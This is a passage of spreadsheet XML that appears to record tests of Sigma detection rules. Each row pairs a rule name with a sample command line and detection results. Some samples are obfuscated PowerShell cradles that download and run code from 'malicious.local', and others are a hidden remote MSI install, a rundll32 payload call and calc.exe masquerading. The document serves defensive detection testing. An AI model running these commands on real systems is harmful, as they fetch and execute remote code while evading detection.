          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C895" s="36" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D895" s="36" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E895" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c1='Invoke-'; $c2='Expression'; $run=$c1+$c2; &amp;$run (.('New-Object') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F895" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G895" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H895" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I895" s="36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895" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K895" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="896" ht="15.75" customHeight="1" s="42">
      <c r="A896" s="36" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B896" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C896" s="36" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D896" s="36" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E896" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c1='Invoke-'; $c2='Expression'; $run=$c1+$c2; &amp;$run (.('New-Object') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F896" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G896" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H896" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I896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896" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K896" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="897" ht="15.75" customHeight="1" s="42">
      <c r="A897" s="36" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B897" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C897" s="36" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D897" s="36" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E897" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp;('In'+'voke-E'+'xpression') (.('Ne'+'w-Ob'+'ject') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F897" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G897" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H897" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I897" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J897" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K897" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="898" ht="15.75" customHeight="1" s="42">
      <c r="A898" s="36" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B898" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C898" s="36" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D898" s="36" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E898" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp;('In'+'voke-E'+'xpression') (.('Ne'+'w-Ob'+'ject') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F898" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G898" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H898" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I898" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J898" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K898" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="899" ht="15.75" customHeight="1" s="42">
      <c r="A899" s="36" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B899" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C899" s="36" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D899" s="36" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E899" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "&amp;('In'+'voke-E'+'xpression') (.('Ne'+'w-Ob'+'ject') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F899" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G899" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H899" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I899" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J899" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K899" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="900" ht="15.75" customHeight="1" s="42">
      <c r="A900" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B900" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C900" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D900" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E900" s="36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900" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G900" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H900" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I900" s="43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900" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K900" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="901" ht="15.75" customHeight="1" s="42">
      <c r="A901" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B901" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C901" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D901" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E901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01" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G901" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H901" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I901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901" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K901" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="902" ht="15.75" customHeight="1" s="42">
      <c r="A902" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B902" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C902" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D902" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E902" s="36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02" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G902" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H902" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I902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902" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K902" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="903" ht="15.75" customHeight="1" s="42">
      <c r="A903" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B903" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C903" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D903" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E903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03" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G903" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H903" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I90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903" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K903" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="904" ht="15.75" customHeight="1" s="42">
      <c r="A904" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B904" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C904" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D904" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E904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04" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G904" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H904" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I904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904" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K904" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="905" ht="15.75" customHeight="1" s="42">
      <c r="A905" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B905" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C905" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D905" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E905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905" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G905" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H905" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I905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905" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K905" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="906" ht="15.75" customHeight="1" s="42">
      <c r="A906" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B906" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C906" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D906" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E906" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F906" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G906" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H906" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I906" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J906" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K906" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="907" ht="15.75" customHeight="1" s="42">
      <c r="A907" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B907" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C907" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D907" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E907" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WIndoWStYle Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F907" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G907" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H907" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I907" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J907" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K907" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="908" ht="15.75" customHeight="1" s="42">
      <c r="A908" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B908" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C908" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D908" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E908" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -wInDowsTyLe Hidden -COmMANd "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F908" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G908" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H908" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I908" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J908" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K908" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="909" ht="15.75" customHeight="1" s="42">
      <c r="A909" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B909" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C909" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D909" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E909" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WInDowSTYLE Hidden -cOmmaND "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F909" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G909" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H909" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I909" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J909" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K909" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="910" ht="15.75" customHeight="1" s="42">
      <c r="A910" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B910" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C910" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D910" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E910" s="36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910" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G910" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H910" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I910" s="43" t="n"/>
      <c r="J910" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K910" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="911" ht="15.75" customHeight="1" s="42">
      <c r="A911" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B911" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C911" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D911" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E911" s="36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911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I911" s="43" t="n"/>
      <c r="J911" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K911" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="912" ht="15.75" customHeight="1" s="42">
      <c r="A912" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B912" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C912" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D912" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E912" s="43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912" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G912" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H912" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I912" s="43" t="n"/>
      <c r="J912" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K912" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="913" ht="15.75" customHeight="1" s="42">
      <c r="A913" s="36" t="n"/>
      <c r="B913" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_obfuscated_ordinal_call</t>
        </is>
      </c>
      <c r="C913" s="36" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32</t>
        </is>
      </c>
      <c r="D913" s="36" t="inlineStr">
        <is>
          <t>43fa5350-db63-4b8f-9a01-789a427074e1</t>
        </is>
      </c>
      <c r="E913" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll,#131096</t>
        </is>
      </c>
      <c r="F913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I913" s="43" t="n"/>
      <c r="J913" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K913" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="914" ht="15.75" customHeight="1" s="42">
      <c r="A914" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B914" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C914" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D914" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E914" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\calc.exe C:\Temp\math.exe &amp;&amp; C:\Temp\math.exe -sUspicIoUS_flAg</t>
        </is>
      </c>
      <c r="F914" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I914" s="4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J914" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K914" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="915" ht="15.75" customHeight="1" s="42">
      <c r="A915" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B915" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C915" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D915" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E915" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\calc.exe C:\Temp\math.exe &amp;&amp; C:\Temp\math.exe /"suspicious_flag"</t>
        </is>
      </c>
      <c r="F915" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G915" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H915" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I915" s="4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J915" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K915" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="916" ht="15.75" customHeight="1" s="42">
      <c r="A916" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B916" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C916" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D916" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E916" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\calc.exe C:\Temp\math.exe &amp;&amp; C:\Temp\math.exe -sUsPiCIouS_flAG</t>
        </is>
      </c>
      <c r="F916" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G916" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H916" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I916" s="4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J916" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K916" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="917" ht="15.75" customHeight="1" s="42">
      <c r="A917" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B917" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C917" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D917" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E917" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\calc.exe C:\Temp\math.exe &amp;&amp; C:\Temp\math.exe -SuSpICIouS_FLAg</t>
        </is>
      </c>
      <c r="F917" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G917" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H917" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I917" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage (737e618a-a410-49b5-bec3-9e55ff7fbc15); LOL-Binary Copied From System Directory (f5d19838-41b5-476c-98d8-ba8af4929ee2); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J917" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K917" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="918" ht="15.75" customHeight="1" s="42">
      <c r="A918" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B918" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C918" s="36" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D918" s="36" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E918" s="43" t="inlineStr">
        <is>
          <t>chcp "936"</t>
        </is>
      </c>
      <c r="F918" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G918" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H918" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I918" s="43" t="n"/>
      <c r="J918" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K918" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="919" ht="15.75" customHeight="1" s="42">
      <c r="A919" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B919" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C919" s="36" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D919" s="36" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E919" s="36" t="inlineStr">
        <is>
          <t>chcp 936</t>
        </is>
      </c>
      <c r="F919" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G919" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H919" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I919" s="43" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP (c7942406-33dd-4377-a564-0f62db0593a3)</t>
        </is>
      </c>
      <c r="J919" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K919" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="920" ht="15.75" customHeight="1" s="42">
      <c r="A920" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B920" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C920" s="36" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D920" s="36" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E920" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c chcp 0936</t>
        </is>
      </c>
      <c r="F920" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G920" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H920" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I920" s="43" t="n"/>
      <c r="J920" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K920" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="921" ht="15.75" customHeight="1" s="42">
      <c r="A921" s="43" t="n"/>
      <c r="B921" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C921" s="36" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D921" s="36" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E921" s="36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F921" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G921" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H921" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I921" s="43" t="n"/>
      <c r="J921" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K921" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="922" ht="15.75" customHeight="1" s="42">
      <c r="A922" s="43" t="n"/>
      <c r="B922" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_break_process_tree</t>
        </is>
      </c>
      <c r="C922" s="36" t="inlineStr">
        <is>
          <t>Explorer Process Tree Break</t>
        </is>
      </c>
      <c r="D922" s="36" t="inlineStr">
        <is>
          <t>949f1ffb-6e85-4f00-ae1e-c3c5b190d605</t>
        </is>
      </c>
      <c r="E922" s="36" t="inlineStr">
        <is>
          <t>explorer.exe "/root,C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F922" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G922" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H922" s="36" t="b">
